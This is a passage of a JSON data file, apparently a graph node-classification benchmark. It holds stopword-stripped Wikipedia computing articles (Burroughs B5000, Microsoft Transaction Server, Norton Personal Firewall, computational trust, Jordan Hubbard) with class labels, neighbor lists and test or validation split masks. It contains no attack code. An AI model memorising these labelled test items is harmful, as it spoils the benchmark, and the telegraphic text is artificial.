tag 1 words represent on-stack data addresses normal irw simply stores address couple data current stack sirw references data stack including stack number address tag 5 words descriptors fully described next section tag 5 words represent off-stack data addresses tag 7 program control word describes procedure entry point operators hit pcw procedure entered entr operator explicitly enters procedure non-value-returning routine functions value-returning routines implicitly entered operators value call valc note global routines stored 2 environment sirws point pcw stored code segment dictionary 1 environment 1 environment stored current stack referenced processes sharing code thus code reentrant shared tag 3 represents code words wo n't occur stack tag 3 also used stack control words mscw rcw toscw figure left shows burroughs large system architecture fundamentally hardware architecture object-oriented programming something still n't exist conventional architectures b5000 line also pioneers multiple processors connected together high-speed bus b7000 line could eight processors long least one i/o module note rdlk low-level way synchronizing processors high level used user programs event data type event data type system overhead avoid overhead special locking technique called dahm locks named burroughs software guru dave dahm used notable operators heyu — send interrupt another processor rdlk — low-level semaphore operator load register memory location given register place value b register memory location single uninterruptible cycle algol compiler produced code invoke operator via special function enabled swap operation single-word data without explicit temporary value codice_1 whoi — processor identification idle — idle interrupt received two processors could infrequently simultaneously send 'heyu command resulting lockup known deadly embrace direct influence b5000 seen current unisys clearpath range mainframes direct descendants b5000 still mcp operating system 40 years consistent development architecture called emode emulation mode since b5000 architecture implemented machines built intel xeon processors running x86 instruction set native instruction set code running processors emulating b5000 instruction set machines also going nmode native mode dropped may often hear b5000 successor machines referred emode machines b5000 machines programmed exclusively high-level languages assembler b5000 stack architecture inspired chuck moore designer programming language forth encountered b5500 mit forth early years moore described influence noting forth dup drop swap came corresponding b5500 instructions dupl dlet exch b5000 machines stack-based architecture tagged memory also heavily influenced soviet elbrus series mainframes supercomputers first two generations series featured tagged memory stack-based cpus programmed high-level languages existed kind assembly language called el-76 less modification algol 68 supported structured programming first-class procedures later generations series though switched away architecture epic-like vliw cpus hewlett-packard designers hp 3000 business system used b5500 greatly impressed hardware software aimed build 16-bit minicomputer similar software several hp divisions created similar minicomputer microprocessor stack machines bob barton work reverse polish notation rpn also found way hp calculators beginning 9100a notably hp-35 subsequent calculators nonstop systems designed tandem computers late 1970s early 1980s also 16-bit stack machines influenced b5000 indirectly hp 3000 connection several early tandem engineers formerly hp around 1990 systems migrated mips risc architecture continued support execution stack machine binaries object code translation direct emulation sometime 2000 systems migrated itanium architecture continued run legacy stack machine binaries bob barton also influential alan kay kay also impressed data-driven tagged architecture b5000 influenced thinking developments object-oriented programming smalltalk another facet b5000 architecture secure architecture runs directly hardware technique descendants virtual machines today attempts provide secure environments one notable product java jvm provides secure sandbox applications run value hardware-architecture binding existed emode would substantially preserved x86-based machines extent mcp one control program support provided machines still inferior provided machines b5000 instruction set native instruction set little-known intel processor architecture actually preceded 32-bit implementations x86 instruction set intel iapx 432 would provided equivalent physical basis essentially object-oriented architecture",
    "neighbors": [
      512,
      6529,
      3716,
      5384,
      10508,
      6797,
      5523,
      3350,
      1820,
      5501,
      11295,
      4900,
      5156,
      5503,
      2345,
      428,
      2477,
      10668,
      7983,
      5040,
      1073,
      10669,
      11059,
      823,
      8122,
      1469,
      4799,
      3904,
      2625,
      8001,
      2115,
      1606,
      1480,
      3529,
      1610,
      1611,
      4424,
      5065,
      8136,
      9804,
      9932,
      10568,
      2002,
      5714,
      9172,
      2519,
      11351,
      10585,
      477,
      9309,
      1376,
      2533,
      6502,
      7273,
      5354,
      2283,
      9964,
      2798,
      9330,
      499,
      5492,
      9331,
      11253,
      3960,
      3323,
      8700,
      2045,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 1703,
    "label": 2,
    "text": "Microsoft_Transaction_Server:microsoft transaction server microsoft transaction server mts software provided services component object model com software components make easier create large distributed applications major services provided mts automated transaction management instance management just-in-time activation role-based security mts considered first major software implement aspect-oriented programming mts first offered windows nt 4.0 option pack windows 2000 mts enhanced better integrated operating system com renamed com+ com+ added object pooling loosely-coupled events user-defined simple transactions compensating resource managers features mts com+ still provided windows server 2003 windows server 2008 microsoft .net framework provides wrapper com+ enterpriseservices namespace windows communication foundation wcf provides way calling com+ applications web services however com+ based com microsoft strategic software architecture web services .net com pure .net-based alternatives many features provided com+ long term likely com+ phased basic mts architecture comprises com components run control mts executive called mts components com+ referred com+ applications mts components in-process dlls mts components deployed run mts executive manages com components object implementing iclassfactory interface serves factory object create new instances components mts inserts factory wrapper object object wrapper actual mts object client interposing wrappers called interception whenever client makes call mts component wrappers factory object intercept call inject instance-management algorithm called just-in-time activation jita call wrapper makes call actual mts component interception considered difficult time due lack extensible metadata addition based information component deployment properties transaction logic security checks also take place wrapper objects every mts-hosted object also exists context object implements iobjectcontext interface context object maintains specific information object transactional information security information deployment information methods mts component call context object iobjectcontext interface mts create actual middle-tier mts object call client reaches container since object running time use lot system resources even though object wrapper skeleton object persist soon call comes client mts wrapper process activates instance management algorithm called jita actual mts object created time service request wrapper request serviced reply sent back client component either calls setcomplete /setabort transaction ends client calls release reference object actual mts object destroyed short mts uses stateless component model generally client requests services typical mts component following sequence occurs server thus possible implement high-latency resources asynchronous resource pools take advantage stateless jit activation afforded middleware server",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      853,
      3413,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      8609,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      8122,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 1704,
    "label": 7,
    "text": "Stackdriver:stackdriver google stackdriver freemium credit card required cloud computing systems management service offered google provides performance diagnostics data form monitoring logging tracing error reporting alerting public cloud users stackdriver hybrid cloud solution providing support google cloud aws cloud environments stackdriver company created 2012 founders dan belcher izzy azeri company goal provide consistent monitoring across cloud computing multiple service layers using single saas solution stackdriver secured 5 million funding bain capital ventures july 2012 beta version product became publicly available april 30 2013 may 2014 stackdriver company acquired google expanded version product adding support logs analysis hybrid cloud support deep integration google cloud rebranded google stackdriver launched general availability october 2016 stackdriver focus improving performance availability large complex applications running public cloud provides metrics detailing every layer 'stack form charts graphs supports multi-cloud environments provides single pane glass users cloud services provides views logs generated allows users generate metrics logs allows users receive alerts metrics breach normal levels",
    "neighbors": [
      7248,
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 1705,
    "label": 7,
    "text": "PerfKitBenchmarker:perfkitbenchmarker perfkit benchmarker open source benchmarking tool used measure compare cloud offerings perfkit benchmarker licensed apache 2 license terms perfkit benchmarker community effort involving 500 participants including researchers academic institutions companies together originator google perfkit benchmarker pkb community effort deliver repeatable consistent open way measuring cloud performance supports growing list cloud providers including alibaba cloud amazon web services cloudstack digitalocean google cloud platform kubernetes microsoft azure openstack rackspace ibm bluemix softlayer addition cloud providers supports container orchestration including kubernetes mesos local static workstations clusters computers goal create open source living benchmark framework represents cloud developers building applications evaluating cloud alternatives learning architect applications cloud living change morph quickly developers change perfkit benchmarker measures end end time provision resources cloud addition reporting standard metrics peak performance e.g latency throughput time-to-complete iops perfkit benchmarker reduces complexity running benchmarks supported cloud providers unified simple commands designed operate via vendor provided command line tools perfkit benchmarker contains canonical set public benchmarks benchmarks running default/initial state configuration tuned favor providers provides way benchmark across cloud platforms getting transparent view application throughput latency variance overhead perfkit benchmarker pkb started anthony f. voellm alain hamel eric hankland google 2014 initial alpha place anthony f. voellm ivan santa maria filho built community including arm broadcom canonical centurylink cisco cloudharmony cloudspectator ecocloud epfl intel mellanox microsoft qualcomm technologies inc. rackspace red hat tradeworx inc. thesys technologies llc community worked together behind scenes private github project create open way measure cloud performance community released first public beta released february 11 2015 announced blog post point github project open everyone almost year large adaption 600+ participants github v1.0.0 released along detailed architectural design december 10 2015 many members made significant contributions pkb community appreciative particular carlos torres rackspace mateusz blaszkowski intel made significant contributions became first members outside google committer rights find pkb community github participate list available benchmarks perfkitbenchmarker latest set benchmarks found github readme file since google open sourced perfkitbenchmarker became community effort 30 leading researchers academic schools industry companies organizations include arm broadcom canonical centurylink cisco cloudharmony cloud spectator ecocloud epfl intel mellanox microsoft qualcomm technologies rackspace red hat thesys technologies addition stanford mit leading quarterly discussions default benchmarks settings proposed community ecocloud epfl integrating cloudsuite perfkit benchmarker example run google cloud platform example run aws example run azure example run rackspace example run local machine",
    "neighbors": [
      448,
      2081,
      9863,
      3819,
      1935,
      5295,
      7248,
      9455,
      1363,
      8692
    ],
    "mask": "Test"
  },
  {
    "node_id": 1706,
    "label": 8,
    "text": "Web_Bot:web bot web bot internet bot computer program whose developers claim able predict future events tracking keywords entered internet developed 1997 originally predict stock market trends creator web bot project clif high along associate george ure keep technology algorithms largely secret sell predictions via website internet bots monitor news articles blogs forums forms internet chatter words lexicon assigned numeric values emotional quantifiers duration impact immediacy intensity others lexicon dynamic changes according shifts emotional tension humans communicate changes using internet 2008 300,000 keywords lexicon along emotional context fed computer-generated modelspace operators web bot interpret bot results make report called alta report available website paying subscribers alta stands asymmetric language trend analysis many believe predictions pseudoscientific vague meaningful despite creators made many claims fact reports predicted important events history channel discussed web bot special doomsday 2012 shows feature predictions end world nostradamus effect globe mail journalist noted tom chivers daily telegraph notes three criticisms project",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1707,
    "label": 3,
    "text": "SPARC_Enterprise:sparc enterprise sparc enterprise series range unix server computers based sparc v9 architecture co-developed sun microsystems fujitsu introduced 2007 marketed sold sun microsystems later oracle corporation acquisition sun fujitsu fujitsu siemens computers common brand sparc enterprise superseding sun sun fire fujitsu primepower server product lines since 2010 servers based new sparc cmt processors sparc t3 later branded oracle sparc t-series servers midrange high-end sparc64 vi sparc64 vii sparc64 vii+ processor based servers designated m-series indicates ras features similar mainframe class machines sparc64 vi dual-core processor core featuring two-way vertical multi-threading vmt m9000 server configured maximum number processors supports running 256 concurrent threads vmt coarse-grained multi-threading implementation core sparc64 vi handle two strands threads vmt switches execution one strand basis events execute instructions another thread pipeline must saved/flushed switched registers thread events include l2 cache misses hardware timer exception interrupts multi-threading-related control instructions also called switch event soe threading 2008 fujitsu released sparc64 vii quad-core processor core featuring two-way simultaneous multi-threading existing m-class servers able upgrade sparc64 vii processors field 2010 fujitsu released sparc64 vii+ running higher frequency larger l2 cache predecessor sparc64 vii sparc64 vii+ processor module includes four physical cores core execute two threads physical core able run threads simultaneously smt context-switch time two threads share instruction pipeline smoothly ready run alternate cycles superscalar instruction issue share functional units according need important capability m-series ability mix processor generations clock speeds system domain m-series servers sparc64 vi sparc64 vii cpus installed run native speeds clocking slowest cpu april 17 2007 sun sparc enterprise m9000 achieved 1.032 tflops linpack benchmark making fastest single system supercomputer time may 2 2008 sun sparc enterprise m9000 server achieved world performance record tpc-h data warehousing benchmark 1 terabyte scale factor using oracle database february 19 2009 sparc enterprise m8000 holds 64-thread world performance records spec omp2001 benchmark medium large ultrasparc t1-based sun fire t1000 t2000 rebranded sparc enterprise october 2007 sun added ultrasparc t2-based servers sparc enterprise line april 2008 sun added ultrasparc t2 plus-based servers sparc enterprise line october 2008 sun released 4-way smp ultrasparc t2 plus-based server sparc enterprise models licensed run solaris 10 solaris 11 m-series supports dynamic domains dynamic reconfiguration enable single machine divided multiple electrically isolated partitions ultrasparc t1 ultrasparc t2/t2+ models partition system using logical domains m-series t-series models support solaris containers supports maximum 8191 non-global zones dynamic domain logical domain",
    "neighbors": [
      1539,
      9731,
      36,
      10789,
      9766,
      5677,
      7218,
      4664,
      1594,
      597,
      10837,
      10327,
      11363,
      10340,
      7270,
      5233,
      9333,
      631,
      9343,
      1675,
      4235,
      4241,
      2710,
      6815,
      8863,
      8353,
      8871,
      2731,
      3247,
      6322,
      4285,
      9920,
      6338,
      10436,
      6341,
      3285,
      1755,
      2269,
      1250,
      9955,
      5872,
      8434,
      1788,
      3328,
      1801,
      1809,
      1818,
      8994,
      1316,
      9010,
      9012,
      2871,
      10553,
      6464,
      3911,
      8007,
      2895,
      3919,
      5471,
      4960,
      3431,
      11626,
      7022,
      11636,
      1399,
      11129,
      10108,
      9090,
      7072,
      9137,
      10675,
      7104,
      9665,
      1480,
      10200,
      6107,
      1503,
      7148,
      8179
    ],
    "mask": "Test"
  },
  {
    "node_id": 1708,
    "label": 4,
    "text": "Norton_Personal_Firewall:norton personal firewall norton personal firewall developed symantec discontinued personal firewall ad blocking program control privacy protection capabilities norton personal firewall program control module able allow deny individual applications access internet programs automatically allowed denied internet access norton personal firewall uses blacklist whitelist determine program allowed internet access advertisement-blocking feature software rewrites html one browser uses display web pages searches code related advertisements blacklist prevents web page displayed privacy control component blocks browser cookies active content prevents transmission sensitive data standard pop3 e-mail clients microsoft office e-mail attachments instant messaging services msn messenger windows messenger aol instant messenger without user consent",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      5512,
      6797,
      7955,
      1172,
      10903,
      9496,
      6297,
      3482,
      1436,
      4511,
      5536,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      3885,
      7983,
      8368,
      8753,
      2870,
      823,
      569,
      5178,
      11065,
      11577,
      9279,
      3520,
      5057,
      1858,
      10433,
      11073,
      2118,
      2378,
      4814,
      8398,
      9423,
      7121,
      10574,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      9569,
      5860,
      3942,
      10987,
      8943,
      4464,
      8816,
      6643,
      9971,
      10872,
      1273,
      8572,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 1709,
    "label": 4,
    "text": "Computational_trust:computational trust information security computational trust generation trusted authorities user trust cryptography centralised systems security typically based authenticated identity external parties rigid authentication mechanisms public key infrastructures pkis kerberos allowed model extended distributed systems within closely collaborating domains within single administrative domain recent years computer science moved centralised systems distributed computing evolution several implications security models policies mechanisms needed protect users ’ information resources increasingly interconnected computing infrastructure identity-based security mechanisms authorise operation without authenticating claiming entity means interaction occur unless parties known authentication frameworks spontaneous interactions would therefore require single trusted certificate authorities cas present context pki considered since issues thus unlikely establish reference standard near future user wishes collaborate another party choose enabling security thereby disabling spontaneous collaboration disabling security enabling spontaneous collaboration fundamental mobile users devices authenticate autonomous way without relying common authentication infrastructure order face problem need examine challenges introduced global computing term coined eu future global information society identify impact security computational trust applies human notion trust digital world seen malicious rather cooperative expected benefits according marsh et al. result use others ability delegation increased cooperation open less protected environment research area computational mechanisms trust reputation virtual societies directed towards increased reliability performance digital communities trust-based decision specific domain multi-stage process first step process consists identifying selecting proper input data trust evidence general domain-specific derived analysis conducted application involved next step trust computation performed evidence produce trust values means estimation trustworthiness entities particular domain selection evidence subsequent trust computation informed notion trust defined trust model finally trust decision taken considering computed values exogenous factors like disposition risk assessments concepts heightened relevance last decade computer science particularly area distributed artificial intelligence multi-agent system paradigm growth e-commerce increased interest trust reputation fact trust reputation systems recognized key factors electronic commerce systems used intelligent software agents incentive decision-making deciding whether honor contracts mechanism search trustworthy exchange partners particular reputation used electronic markets trust-enforcing mechanism method avoid cheaters frauds another area application concepts agent technology teamwork cooperation several definitions human notion trust proposed last years different domains sociology psychology political business science definitions may even change accordance application domain example romano recent definition tries encompass previous work domains trust reputation social value someone trustworthy person may expected perform beneficial least suspicious way assure others high probability good collaborations contrary someone appears trustworthy others refrain collaborating since lower level probability collaborations successful trust strongly connected confidence implies degrees uncertainty hopefulness optimism eventually marsh addressed issue formalizing trust computational concept phd thesis trust model based social psychological factors lot proposals appeared literature selection computational trust reputation models represent good sample current research presented trust reputation analysed different points view applied many situations next classification based considering peculiar characteristics models environment evolve trust reputation model characterized models based cognitive approach trust reputation made underlying beliefs function degree beliefs mental states lead trust another agent assign reputation essential part model well mental consequences decision act relying another agent neurological trust models based neurological theories interaction affective cognitive states modeled neurological level well using theories embodiment emotions models trust dynamics relate experiences external sources cognitive affective perspective specifically feeling emotion associated mental state converging recursive body loops modeled addition based hebbian learning strength connections emotional responses different adaptation processes introduced inspired somatic marker hypothesis trust reputation considered subjective probabilities individual expects individual b perform given action welfare depends approach trust reputation result mental state agent cognitive sense result pragmatic game utility functions numerical aggregation past interactions possible sort models considering information sources used compute trust reputation values traditional information sources direct experiences witness information recent models started consider connection information sociological aspect agent behavior model contains several information sources increase reliability results conversely increase complexity model direct experience relevant reliable information source trust/reputation model two types direct experiences recognizable witness information also called indirect information comes experience members community based direct experience data gathered others ’ experience witness information usually abundant use complex trust reputation modelling fact introduces uncertainty agents manipulate hide parts information benefit people belong community establish different types relations individual plays one several roles society influencing behavior interaction people multi-agent system plenty interactions social relations among agents simplified reflection complex relations human counterparts trust reputation models adopt sociological information using techniques like social network analysis methods study social relationships among individuals society emerged set methods analysis social structures methods specifically allow investigation relational aspects structures prejudice another though uncommon mechanism influences trust reputation according method individual given properties particular group make recognisable member signs uniform definite behavior etc people today use word prejudice refers negative hostile attitude towards another social group often racially defined however negative connotation revised applied agent communities set signs used computational trust reputations models usually ethical discussion differently signs used human societies like skin color gender literature cognitive social sciences claims humans exhibit non-rational biased behavior respect trust recently biased human trust models designed analyzed validated empirical data results show biased trust models able predict human trust significantly better unbiased trust models relevant sources information considered trust reputation models presented direct experiences witness information e-markets sociological information almost non-existent order increase efficiency actual trust reputation models considered however reason increase complexity models introducing trust evidence later used environment possible realise capabilities aggregation trust reputation evidence useful computational model increase complexity making general solution difficult several models dependent characteristics environment possible solution could use adaptive mechanisms modify combine different sources information given environment lot trust reputation definitions presented several works give meaning concepts relation concepts considered depth reputation concept helps build trust others nowadays game theory predominant paradigm considered design computational trust reputation models likelihood theory taken account significant number economists computer scientists strong background game theory artificial intelligence techniques working multi-agent e-commerce contexts game theoretical models produce good results may appropriate complexity agents terms social relations interaction increases becomes restrictive exploration new possibilities considered example merging cognitive approaches game theoretical ones apart trust evidence considered well time-sensitive trust metrics represent first step encourage improvement computational trust important issue modeling trust represented transferability trust judgements different agents social scientists agree consider unqualified trust values transferable pragmatic approach would conclude qualified trust judgments worth transferred far decisions taken considering others ’ opinion better ones taken isolation authors investigated problem trust transferability open distributed environments proposing translation mechanism able make information exchanged one agent another accurate useful currently commonly accepted evaluation framework benchmark would allow comparison models set representative common conditions game-theoretic approach direction proposed configuration trust model optimized assuming attackers optimal attack strategies allows next step compare expected utility different trust models similarly model-based analytical framework predicting effectiveness reputation mechanisms arbitrary attack models arbitrary system models proposed peer-to-peer systems",
    "neighbors": [
      3552,
      3776,
      9248,
      7368,
      5389,
      10831,
      11567,
      6098,
      755,
      5433,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1710,
    "label": 2,
    "text": "Image_Capture:image capture image capture application program apple enables users upload pictures digital cameras scanners either connected directly computer network provides organizational tools like iphoto useful collating pictures variety sources need drivers image capture scriptable applescript may manipulated mac os x v10.4 tiger automator application mac os x 10.4 image capture applescript dictionary open script editor mac os x 10.6 image capture web server opens script editor",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      2356,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 1711,
    "label": 4,
    "text": "Information_security_indicators:information security indicators information technology benchmarking computer security requires measurements comparing different systems single systems dedicated situations technical approach pre-defined catalog security events security incident vulnerability together corresponding formula calculation security indicators accepted comprehensive information security indicators standardized etsi industrial specification group isg isi indicators provide basis switch qualitative quantitative culture security scope measurements external internal threats attempt success user deviant behaviours nonconformities and/or vulnerabilities software configuration behavioural general security framework 2019 isg isi terminated related standards maintained via etsi tc cyber list information security indicators belongs isi framework consists following eight closely linked work items preliminary work information security indicators done french club r2gs first public set isi standards security indicators list event model released april 2013",
    "neighbors": [
      6360,
      5636,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1712,
    "label": 6,
    "text": "ExtremeZ-IP:extremez-ip extremez-ip apple filing protocol server grouplogic inc arlington virginia usa runs windows operating systems enabling mac clients access files via apple filing afp 3.3 protocol starting version 8.0 network reshare capability allows extremez-ip server proxy access file shares secondary file server nas device netapp isilon extremez-ip also provides access windows services printing searching file system archiving distributed file system volume shadow service extremez-ip supports macintosh clients running mac os 9.2 mac os 10.9 mavericks extremez-ip extremez-ip.exe requires windows supports windows server 2012 windows server 2008 r2 32-bit 64-bit windows storage server windows home server windows 2003 server windows xp windows xp embedded windows powered nas extremez-ip first third party file server support time machine apple software support searching via apple network spotlight software provides indexed content search search accomplished translating passing search query microsoft windows search service passing results back mac user via reverse process extremez-ip links macs microsoft distributed file system microsoft dfs optional shadowconnect microsoft volume shadow copy service vss snapshots extremez-ip version 9.0 added option index remote volumes enable spotlight searching mac users remote volumes n't local index search capabilities including network attached storage nas emc netapp isilon stornext san volumes",
    "neighbors": [
      11011,
      6797,
      7983,
      2193,
      8404,
      1212
    ],
    "mask": "Test"
  },
  {
    "node_id": 1713,
    "label": 8,
    "text": "ORBX.js:orbx.js orbx.js javascript library codec able stream video html5-compliant browser project partnership mozilla otoy",
    "neighbors": [
      1664,
      3462,
      6791,
      9736,
      1295,
      7951,
      2836,
      10006,
      11418,
      9757,
      803,
      7983,
      7861,
      11449,
      5054,
      7871,
      9152,
      9281,
      10057,
      2893,
      7889,
      5078,
      6231,
      10078,
      482,
      10722,
      8169,
      5612,
      10860,
      6133,
      7543,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 1714,
    "label": 4,
    "text": "Robert_E._Rich:robert e. rich robert ellett rich born december 15 1926 american intelligence official deputy director national security agency 1982 1986 time highest ranking civilian agency working internal management also far east expert joined nsa 1962 worked office assistant secretary defense special operations prior worked armed forces security agency starting 1950 nsa predecessor time nsa also served japan office agency well special u.s. liaison officer london recipient national security medal presented president ronald reagan 1996 2003 served president board directors national cryptological museum foundation",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 1715,
    "label": 2,
    "text": "Automatic_Reference_Counting:automatic reference counting automatic reference counting arc memory management feature clang compiler providing automatic reference counting objective-c swift programming languages compile time inserts object code messages codice_1 codice_2 increase decrease reference count run time marking deallocation objects number references reaches zero arc differs tracing garbage collection background process deallocates objects asynchronously runtime unlike tracing garbage collection arc handle reference cycles automatically means long strong references object deallocated strong cross-references accordingly create deadlocks memory leaks developer break cycles using weak references apple inc. deploys arc operating systems macos ios limited support arclite available since snow leopard ios 4 complete support following lion ios 5 garbage collection declared deprecated mountain lion favor arc removed objective-c runtime library macos sierra following rules enforced compiler arc turned // without arc void dealloc // arc void dealloc // without arc nsstring givemeastring // arc nsstring givemeastring // without arc void loopthrougharray nsarray array // arc void loopthrougharray nsarray array arc introduces new property declaration attributes replace old attributes zeroing weak references feature objective-c arc automatically clears sets codice_19 weak-reference local variables instance variables declared properties immediately object pointed starts deallocating ensures pointer goes either valid object codice_19 avoids dangling pointer s. prior introduction feature weak references referred references retaining set codice_19 object pointed deallocated equivalent codice_22 arc thus possibly leading dangling pointer programmer typically ensure possible weak references object set nil manually deallocated zeroing weak references obviates need zeroing weak references indicated using property declarations|declared property attribute codice_23 using variable attribute codice_24 zeroing weak references available mac os x lion 10.7 later ios 5 later require additional support objective-c runtime however os x classes currently support weak references code uses arc needs support versions os older use zeroing weak references therefore must use codice_22 weak references exists third-party library called plweakcompatibility allows one use zeroing weak references even older os versions xcode 4.2 later provides way convert code arc xcode 4.5 found choosing edit refactor convert objective-c arc ... although xcode automatically convert code code may converted manually xcode inform developer complex use cases arise variable declared inside autorelease pool used outside two objects need toll-free bridged special casts swift references objects strong unless declared codice_23 codice_27 swift requires explicit handling nil optional type value type either value nil optional type must handled unwrapping conditional computer programming |conditional statement allowing safe usage value present conversely non-optional type always value nil var mystring string // string var myotherstring string // string nil let mystring myotherstring // unwrap optional accordingly strong reference object type optional object kept heap reference deallocated weak reference type optional object deallocated reference set nil unowned references fall in-between neither strong type optional instead compiler assumes object unowned reference points deallocated long reference remains allocated typically used situations target object holds reference object holds unowned reference var strongreference myclass // strong reference nil weak var weakreference myclass // weak reference nil unowned var unownedreference myclass // weak reference nil swift also differs objective-c usage encouragement value type|value types instead reference type|reference types types swift standard library value types copied value whereas classes closure computer programming |closures reference types passed reference value types copied passed around deallocated automatically reference created category objective-c category memory management",
    "neighbors": [
      2304,
      4998,
      4747,
      9490,
      541,
      10783,
      1952,
      3871,
      1954,
      5154,
      10581,
      10584,
      7133,
      8037,
      10470,
      3948,
      10478,
      8303,
      7292
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1716,
    "label": 9,
    "text": "Richard_Merrill:richard merrill richard merrill digital equipment corporation employee invented focal programming language programmed first two interpreters language 1968 1969 pdp-8 also developed later versions interpreter pdp-7 pdp-9 later ported pdp-11 merrill also designed programmed edit-8 text editor using paper-tape merrill alumnus phillips andover preparatory school mit",
    "neighbors": [
      8732,
      8910,
      8503
    ],
    "mask": "None"
  },
  {
    "node_id": 1717,
    "label": 2,
    "text": "Dave_Taylor_(game_programmer):dave taylor game programmer dave d. taylor american game programmer best known former id software employee noted work promoting linux gaming 1993 graduated university texas austin bachelor science degree electrical engineering taylor worked id software 1993 1996 time involved development doom quake created ports games irix aix solaris linux helped program atari jaguar ports doom wolfenstein 3d also considers spackle coder doom adding things status bar sound library integration automap level transitions cheat codes network chat system quake wrote original sound engine dos tcp/ip network library added vesa 2.0 support one musical themes doom ii dave d. taylor blues named robert prince 2003 book mentions habit passing prolonged playing doom employees would incidents sketch body outline unconscious form masking tape success game bought couch pass attempts talk quake on-line purchase acura nsx doom money friendship american mcgee eventual departure company also mentioned taylor founded small game company called crack dot com 1996 1998 crack dot com released one game abuse pc platform shooter 1997 interview claimed n't particularly proud abuse set prove person could sell 50,000 copies so-so game led effort build golgotha first-person shooter real-time strategy hybrid company folded completion 1998 2001 worked transmeta president carbon6 2001 2002 also working lead designer producer game boy advance game spy kids challenger since 2002 vice president naked sky entertainment since 2003 also advisor freelance game designer also willing act pay projects 2009 produced abuse classic apple iphone beakiez pc",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      921,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      11631,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 1718,
    "label": 2,
    "text": "Jordan_Hubbard:jordan hubbard jordan k. hubbard born april 8 1963 open source software developer authoring software ardent window manager various open source tools libraries co-founding freebsd project nate williams rodney w. grimes 1993 contributed initial freebsd ports collection package management system sysinstall july 2001 hubbard joined apple computer role manager bsd technology group 2005 title director unix technology october 2007 hubbard promoted director engineering unix technologies apple remained june 2013 july 15 2013 became cto ixsystems also led freenas open source project march 24 2017 announced plan depart ixsystems would joining twoporeguys biotechnology company vp engineering.. january 2019 linkedin profile notes part engineering leadership team uber march 31 1987 hubbard executed rwall command expecting send message every machine network university california berkeley headed distributed unix group command instead began broadcasting hubbard message every machine internet stopped hubbard realised message broadcast remotely received complaints people purdue university university texas even though command terminated resulted hubbard receiving 743 messages complaints including one inspector general arpanet",
    "neighbors": [
      10761,
      2061,
      9743,
      8725,
      4636,
      1071,
      1080,
      5177,
      9784,
      3651,
      7748,
      8266,
      5710,
      7249,
      9306,
      607,
      9320,
      8816,
      9844,
      633,
      8316,
      9343,
      2180,
      4745,
      2212,
      684,
      3248,
      5819,
      11459,
      10436,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      9452,
      11506,
      1273,
      7425,
      1801,
      9487,
      274,
      788,
      1316,
      6438,
      10535,
      4908,
      1839,
      9009,
      11573,
      850,
      6491,
      7521,
      1891,
      873,
      7027,
      2421,
      2424,
      7552,
      5506,
      1927,
      9625,
      1946,
      5534,
      11689,
      11698,
      1465,
      3006,
      9151,
      9153,
      5067,
      10202,
      3551,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1719,
    "label": 1,
